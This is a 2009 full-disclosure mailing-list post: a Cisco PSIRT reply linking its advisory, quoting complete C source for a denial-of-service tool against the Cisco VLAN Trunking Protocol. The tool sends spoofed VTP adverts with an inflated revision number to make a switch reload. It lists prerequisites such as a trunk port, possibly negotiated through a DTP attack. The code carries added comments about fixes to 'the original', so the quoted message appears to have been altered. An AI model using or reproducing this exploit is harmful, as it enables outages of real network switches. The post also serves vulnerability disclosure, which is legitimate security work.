
Re: [Full-disclosure] DoS code for Cisco VLAN Trunking Protocol Vulnerability

From: Paul Oxman (poxman) <poxman_at_nospam>
Date: Wed Jan 14 2009 - 03:50:38 GMT
To: "showrun.lee" <showrun.lee@gmail.com>, <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>

 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

        This is Paul Oxman with Cisco PSIRT.

        For mitigations and workarounds, please consult the Cisco Security Response available at:
http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml

Regards


From: showrun.lee [mailto:showrun.lee@gmail.com]
Sent: Wednesday, January 14, 2009 7:59 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Cc: Paul Oxman (poxman)
Subject: DoS code for Cisco VLAN Trunking Protocol Vulnerability

/* DoS code for Cisco VLAN Trunking Protocol Vulnerability
*
 * Vulnerability description (Cisco Security Response cisco-sr-20081105-vtp):
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml
*
 * Prerequisites:
 * 1. The target switch must be in VTP Server or Client mode.
 * 2. The port the attacker is connected to must be in trunk mode.
 *    Unconfigured Cisco Ethernet ports are not trunks, but trunk mode
 *    can be negotiated with a DTP attack (e.g. using Yersinia).
 * 3. You must know the VTP domain name; it can be sniffed off the wire.
 * 4. Some of this code is taken from Yersinia.
    *
 * Result:
 *   the switch reloads.
    *
    *
    *Compile:
  • gcc -o vtp `libnet-config --libs` vtp.c
    *
    *Usage:vtp -i <interface> -d <vtp_domain>
    *
    *Contact: showrun.lee[AT]gmail.com
    *http://sh0wrun.blogspot.com/
    */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <libnet.h>

#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12

/*
 * Body of a VTP summary advertisement (code 0x01) as it is placed on the
 * wire directly after the 5-byte Cisco SNAP header.  Multi-byte fields are
 * big-endian (the sender below applies htonl() to revision).  Every member
 * is a byte, a byte array or a naturally aligned 32-bit field, so common
 * ABIs add no padding and sizeof is 72 — worth asserting on a new build
 * target, because the struct is written verbatim into the frame.  The
 * sender in this file fills version, code, followers, dom_len, domain and
 * revision only; updater, timestamp and md5 stay zero (the buffer comes
 * from calloc()), i.e. no digest is computed.
 */
struct vtp_summary {
    u_int8_t version;                        /* VTP version byte; sent as 0x01 */
    u_int8_t code;                           /* message code; 0x01 = summary advert */
    u_int8_t followers;                      /* sent as 1; presumably the number of subset adverts that follow */
    u_int8_t dom_len;                        /* number of domain bytes in use (strlen of the -d argument) */
    u_int8_t domain[VTP_DOMAIN_SIZE];        /* management domain name, zero-padded, not NUL-terminated */
    u_int32_t revision;                      /* configuration revision, network byte order */
    u_int32_t updater;                       /* left zero by this tool */
    u_int8_t timestamp[VTP_TIMESTAMP_SIZE];  /* left zero by this tool */
    u_int8_t md5[16];                        /* left zero by this tool; no digest is computed */
};

/*
 * Body of a VTP subset advertisement (code 0x02), placed on the wire after
 * the 5-byte Cisco SNAP header.  Layout matches the first 40 bytes of
 * struct vtp_summary (seq takes the place of followers); no padding on
 * common ABIs, sizeof is 40.  The sender in this file sets every field and
 * sends no VLAN-info payload after it — the frame ends with revision.
 */
struct vtp_subset {
    u_int8_t version;                  /* VTP version byte; sent as 0x01 */
    u_int8_t code;                     /* message code; 0x02 = subset advert */
    u_int8_t seq;                      /* sequence number; sent as 1 */
    u_int8_t dom_len;                  /* number of domain bytes in use (strlen of the -d argument) */
    u_int8_t domain[VTP_DOMAIN_SIZE];  /* management domain name, zero-padded, not NUL-terminated */
    u_int32_t revision;                /* configuration revision, network byte order */
};

/*
 * Print the command-line synopsis on stdout, using s as the program name,
 * and terminate the process with exit status 1.  Never returns.
 */
void usage(char *s)
{
    fprintf(stdout, "%s -i <interface> -d <vtp domain>\n", s);
    exit(EXIT_FAILURE);
}

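/*
 * Destination of both adverts: the Cisco multicast MAC the original code
 * targets.  Kept non-const because older libnet 1.1 prototypes take a
 * plain u_int8_t *.
 */
static u_int8_t vtp_dst_mac[6] = { 0x01, 0x00, 0x0c, 0xcc, 0xcc, 0xcc };

/* SNAP header that precedes every VTP body: OUI 00:00:0c, PID 0x2003 (VTP). */
static const u_int8_t cisco_snap[5] = { 0x00, 0x00, 0x0c, 0x20, 0x03 };

/*
 * Configuration revision stamped on both adverts.  The original author's
 * note: any value bigger than the revision the switch currently holds
 * will do; 2000 is the value the tool has always used.
 */
enum { VTP_SPOOFED_REVISION = 2000 };

/* Values of the 'code' byte used below. */
enum { VTP_CODE_SUMMARY = 0x01, VTP_CODE_SUBSET = 0x02 };

/*
 * Prepend the Cisco SNAP header to body, wrap the result in LLC
 * (DSAP/SSAP 0xaa, control 0x03) and an 802.3 frame from src_mac to the
 * VTP multicast address, and write it through libnet handle l.
 *
 * The body is copied into a fresh calloc()ed buffer that is freed after
 * libnet_write(), as the original code did.  The libnet packet is cleared
 * before returning, on success and on failure, so the next call starts
 * from an empty packet.  `what` names the advert in error messages.
 *
 * Returns 0 on success, -1 on allocation or libnet failure (reported on
 * stderr).
 */
static int send_vtp(libnet_t *l, u_int8_t *src_mac, const void *body,
                    size_t body_len, const char *what)
{
    u_int32_t len = (u_int32_t)(sizeof cisco_snap + body_len);
    u_int8_t *pkt = calloc(1, len);
    int rc = -1;

    if (pkt == NULL) {
        fprintf(stderr, "%s: out of memory\n", what);
        return -1;
    }
    memcpy(pkt, cisco_snap, sizeof cisco_snap);
    memcpy(pkt + sizeof cisco_snap, body, body_len);

    /* Inner header first, then outer: libnet builds from the payload outward.
     * The original never checked the build results; a -1 ptag here means the
     * frame would have gone out malformed. */
    if (libnet_build_802_2(0xaa, 0xaa, 0x03, pkt, len, l, 0) == -1 ||
        libnet_build_802_3(vtp_dst_mac, src_mac, LIBNET_802_2_H + len,
                           NULL, 0, l, 0) == -1 ||
        libnet_write(l) == -1) {
        fprintf(stderr, "%s: %s\n", what, libnet_geterror(l));
    } else {
        rc = 0;
    }

    libnet_clear_packet(l);
    free(pkt);
    return rc;
}

/*
 * Entry point.  Usage: vtp -i <interface> -d <vtp_domain>
 *
 * Sends one VTP summary advert (followers = 1) followed by one subset
 * advert (seq = 1) for the given domain on the given interface, both
 * carrying VTP_SPOOFED_REVISION.  Both options are required; the domain
 * must be 1..VTP_DOMAIN_SIZE bytes, which is the size of the domain field
 * in the adverts (the original copied strlen() bytes unchecked, overflowing
 * the packet buffer for longer names, and crashed on strlen(NULL) when -d
 * was omitted).  Exits EXIT_SUCCESS when both frames were written and
 * EXIT_FAILURE otherwise.
 */
int main(int argc, char *argv[])
{
    int opt;
    char *device = NULL;
    char *domain = NULL;
    size_t dom_len;
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_t *l;
    struct libnet_ether_addr *mymac;
    struct vtp_summary summ;
    struct vtp_subset sub;
    int rc = EXIT_FAILURE;

    /* optarg points into argv, which outlives main: no copy needed (the
     * original malloc(strlen())+strcpy copy was one byte short). */
    while ((opt = getopt(argc, argv, "i:d:")) != -1) {
        switch (opt) {
        case 'i':
            device = optarg;
            break;
        case 'd':
            domain = optarg;
            break;
        default:
            usage(argv[0]);
        }
    }
    if (device == NULL || domain == NULL) {
        fprintf(stderr, "%s: both -i <interface> and -d <vtp domain> are required\n",
                argv[0]);
        usage(argv[0]);
    }

    /* dom_len travels in a u_int8_t and is copied into a VTP_DOMAIN_SIZE field. */
    dom_len = strlen(domain);
    if (dom_len == 0 || dom_len > VTP_DOMAIN_SIZE) {
        fprintf(stderr, "%s: vtp domain must be 1 to %d characters long\n",
                argv[0], VTP_DOMAIN_SIZE);
        return EXIT_FAILURE;
    }

    l = libnet_init(LIBNET_LINK, device, errbuf);
    if (l == NULL) {
        fprintf(stderr, "libnet_init: %s\n", errbuf);
        return EXIT_FAILURE;
    }
    mymac = libnet_get_hwaddr(l);
    if (mymac == NULL) {
        fprintf(stderr, "libnet_get_hwaddr: %s\n", libnet_geterror(l));
        goto out;
    }

    /* Summary advert: code 1, announcing one follower.  updater, timestamp
     * and md5 are deliberately left zero, as in the original code. */
    memset(&summ, 0, sizeof summ);
    summ.version = 0x01;
    summ.code = VTP_CODE_SUMMARY;
    summ.followers = 0x01;
    summ.dom_len = (u_int8_t)dom_len;
    memcpy(summ.domain, domain, dom_len);
    summ.revision = htonl(VTP_SPOOFED_REVISION);
    if (send_vtp(l, mymac->ether_addr_octet, &summ, sizeof summ,
                 "summary advert") == -1)
        goto out;

    /* Subset advert: code 2, sequence 1, same domain and revision. */
    memset(&sub, 0, sizeof sub);
    sub.version = 0x01;
    sub.code = VTP_CODE_SUBSET;
    sub.seq = 0x01;
    sub.dom_len = (u_int8_t)dom_len;
    memcpy(sub.domain, domain, dom_len);
    sub.revision = htonl(VTP_SPOOFED_REVISION);
    if (send_vtp(l, mymac->ether_addr_octet, &sub, sizeof sub,
                 "subset advert") == -1)
        goto out;

    rc = EXIT_SUCCESS;
out:
    libnet_destroy(l);
    return rc;
}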

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSW1hDvOp/xnPFP7gEQKwFQCfQ32qUNzWFL8dISsQew6+JQAFcnoAnRKq yEEThaENUXT3HaLpVs+mdMHD
=U4Vq
-----END PGP SIGNATURE-----


